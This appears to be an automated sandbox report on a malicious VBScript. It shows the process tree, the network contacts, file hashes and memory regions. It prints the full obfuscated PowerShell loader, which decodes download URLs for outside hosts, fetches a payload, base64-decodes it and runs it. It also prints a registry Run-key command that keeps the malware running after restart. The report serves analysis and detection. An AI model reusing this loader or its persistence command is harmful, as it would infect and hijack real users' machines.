PID 3068 wrote to memory of 2384  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2384  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 1240  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Program Files (x86)\windows mail\wab.exe
PID 3068 wrote to memory of 1240  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Program Files (x86)\windows mail\wab.exe
PID 1240 wrote to memory of 2620  N/A        C:\Program Files (x86)\windows mail\wab.exe                C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2620  N/A        C:\Program Files (x86)\windows mail\wab.exe                C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2620  N/A        C:\Program Files (x86)\windows mail\wab.exe                C:\Windows\SysWOW64\cmd.exe
PID 1240 wrote to memory of 2620  N/A        C:\Program Files (x86)\windows mail\wab.exe                C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1976  N/A        C:\Windows\SysWOW64\cmd.exe                                C:\Windows\SysWOW64\reg.exe
PID 2620 wrote to memory of 1976  N/A        C:\Windows\SysWOW64\cmd.exe                                C:\Windows\SysWOW64\reg.exe
PID 2620 wrote to memory of 1976  N/A        C:\Windows\SysWOW64\cmd.exe                                C:\Windows\SysWOW64\reg.exe
PID 2620 wrote to memory of 1976  N/A        C:\Windows\SysWOW64\cmd.exe                                C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"

Network

Country  Destination         Domain              Proto
US       8.8.8.8:53          moviesmacktalk.com  udp
RO       89.42.218.27:443    moviesmacktalk.com  tcp
RO       89.42.218.27:443    moviesmacktalk.com  tcp
RO       89.42.218.27:443    moviesmacktalk.com  tcp
RO       89.42.218.27:443    moviesmacktalk.com  tcp
US       8.8.8.8:53          milanaces.com       udp
BG       193.25.216.108:443  milanaces.com       tcp
BG       193.25.216.108:443  milanaces.com       tcp
US       8.8.8.8:53          r10.o.lencr.org     udp
GB       2.18.190.80:80      r10.o.lencr.org     tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabA8DF.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2692-20-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

memory/2692-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/2692-23-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-22-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2692-25-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-24-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-26-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-27-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CKQ750OV55N18BSWUFGX.temp

MD5 9e3cc2afba423713dce0862a1e7665d2
SHA1 0bdb1a8f2eb12e130479cc48a0c47ffb6626dcd4
SHA256 7a2b0a49611fee20dc9456e231b724c213e46a0526bb9f8a80f7603a293cd6e3
SHA512 baa44caf9146d6a84b1ba6a688a3f71c210eac4d6fdc3c84395f2c3211b8375e28520293f000595e4d7e2de2b974f02821a41e06fa3ec5490e1438dd58e47f2d

C:\Users\Admin\AppData\Roaming\Coqueluche14.myx

MD5 8e72b507dadf417f0f922a8cc04533d5
SHA1 d2fb1f560d46af90f009069855dc1f94179c5b6a
SHA256 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c
SHA512 cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b

memory/2692-33-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-35-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2692-34-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

memory/3068-36-0x00000000065F0000-0x00000000075A0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6abcb26f8bccc06ba812dbffc5933a96
SHA1 4305c908a01dd8059406a15e6b1daaeb7e20db61
SHA256 1da0c861ce504db27e0e764d019af6adf23d5987a9498ffc6446365030793a77
SHA512 30448bb88214cd2059ec7718ad9245d3eb0d86666ed7d2e2ff6fbe6bea582c65afe0e78c22a7aaf084b1efdc4e123eceb980ad0bf99eb7bb26aad8896e1ff2ba

C:\Users\Admin\AppData\Local\Temp\Tar6597.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1240-54-0x0000000000B70000-0x0000000001BD2000-memory.dmp

memory/1240-56-0x0000000001BE0000-0x0000000002B90000-memory.dmp

memory/2692-59-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp